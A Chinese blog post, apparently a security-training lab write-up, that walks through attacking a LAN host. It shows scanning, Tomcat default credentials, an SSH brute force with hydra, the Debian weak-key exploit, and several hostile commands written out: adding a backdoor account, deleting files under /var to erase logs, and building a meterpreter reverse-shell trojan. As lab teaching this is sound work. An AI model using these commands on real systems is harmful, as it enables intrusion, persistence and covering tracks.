局域网攻击演示(网安实训第五天)

 

局域网攻击演示

(1)信息收集

1对局域网进行主机发现扫描:

nmap -sP 192.168.183.0/24

局域网攻击演示(网安实训第五天)_第1张图片

2确定攻击目标:本机ip地址为129,内网中还存在另一台主机,ip为134,这就是我们的目标,我们对它进一步扫描。

nmap -sV 192.168.183.134

局域网攻击演示(网安实训第五天)_第2张图片

通过分析,我们发现:目标主机开启大量可利用端口,ftp、ssh、telnet、smtp、mysql可以进行暴力破解,对方主机也开启了80端口,apache版本为2.2.8,php版本为5.2.4。

3放大招,使用nessus进行漏洞扫描。

局域网攻击演示(网安实训第五天)_第3张图片

局域网攻击演示(网安实训第五天)_第4张图片

4在web扫描这里,我发现一些严重漏洞,这一个可以直接登陆进去:

局域网攻击演示(网安实训第五天)_第5张图片
在这里,我们发现以下信息:

  网址:http://192.168.183.134:8180/manager/html

  用户名:tomcat

  密码:tomcat

  网址:http://192.168.183.134:8180/host-manager/html

  用户名:tomcat

  密码:tomcat

  网址:http://192.168.183.134:8180/manager/status

  用户名:tomcat

  密码:tomcat

局域网攻击演示(网安实训第五天)_第6张图片

好像发现了新大陆,我们继续寻找可用信息。

我们发现管理员路径为admin:

局域网攻击演示(网安实训第五天)_第7张图片

好像没太大用,由于时间比较紧,我们进行下一步。

(2)漏洞发现

通过分析上一步的扫描结果,分析得到以下信息:

局域网攻击演示(网安实训第五天)_第8张图片

找到漏洞编号:

CVE:  CVE-2009-3099CVE-2009-3548CVE-2010-0557CVE-2010-4094

继续寻找之前nessus的扫描结果,找到以下内容:

局域网攻击演示(网安实训第五天)_第9张图片

找到漏洞编号:

局域网攻击演示(网安实训第五天)_第10张图片

找到漏洞编号,cve-2008-0166

(3)渗透测试攻击

1暴力破解

在扫描期间,我们先用hydra暴力破解试试,说不定运气好呢。

hydra -l root -P pass.txt –t 50 -e ns192.168.183.134 ssh

最开始使用上面命令,老是出现could not connect to target,查询了发现时因为线程开太多,被对方封了,所以改成1就可以正常运行。

hydra -l root -P pass.txt -t 1 -vV192.168.183.134 ssh

局域网攻击演示(网安实训第五天)_第11张图片

Success: 'root':'ubuntu' 还是root权限,接下来,直接用xshell连接就好了。

局域网攻击演示(网安实训第五天)_第12张图片

(5)创建账户

Useradd hack

Passwd hack

123

123

(6)清除日志文件

find   /var   -type   f  -exec   rm   -v   {}   \;

局域网攻击演示(网安实训第五天)_第13张图片

通过暴力破解,我们已经获得对方shell,这样好像有点简单。我想继续根据之前获取的信息进行攻击。

2漏洞攻击

Msfconsole搜索,发现并没有:

找到cve官网关于本漏洞的说明:

局域网攻击演示(网安实训第五天)_第14张图片

直接下载利用说明:

根据文档内容进行操作:

局域网攻击演示(网安实训第五天)_第15张图片

首先下载密钥文件:

局域网攻击演示(网安实训第五天)_第16张图片

上传到bt5并解压:

局域网攻击演示(网安实训第五天)_第17张图片

使用/pentest/exploits/exploitdb/searchsploit openssl搜索利用脚本文件:

局域网攻击演示(网安实训第五天)_第18张图片

我们随表找一个,我这里使用python脚本。

find / -name 5720.py

进入/pentest/exploits/exploitdb/platforms/linux/remote/,并执行破解:

python 5720.py /root/rsa/2048192.168.183.134 root

结果如下:

局域网攻击演示(网安实训第五天)_第19张图片

执行:

ssh -lroot -p22 -i/root/rsa/2048/57c3115d77c56390332dc5c49978627a-5429 192.168.183.134

局域网攻击演示(网安实训第五天)_第20张图片

成功获取对方shell。

(4)植入木马

生成木马:

msfpayload linux/x86/meterpreter/reverse_tcpLHOST=192.168.183.129 LPORT=55555 X > runme

将木马上传至目标主机:

在攻击机中开启服务端:

局域网攻击演示(网安实训第五天)_第21张图片

如果目标机不小心运行了木马文件,攻击机即可获得反弹shell。

 

你可能感兴趣的:(局域网攻击演示(网安实训第五天))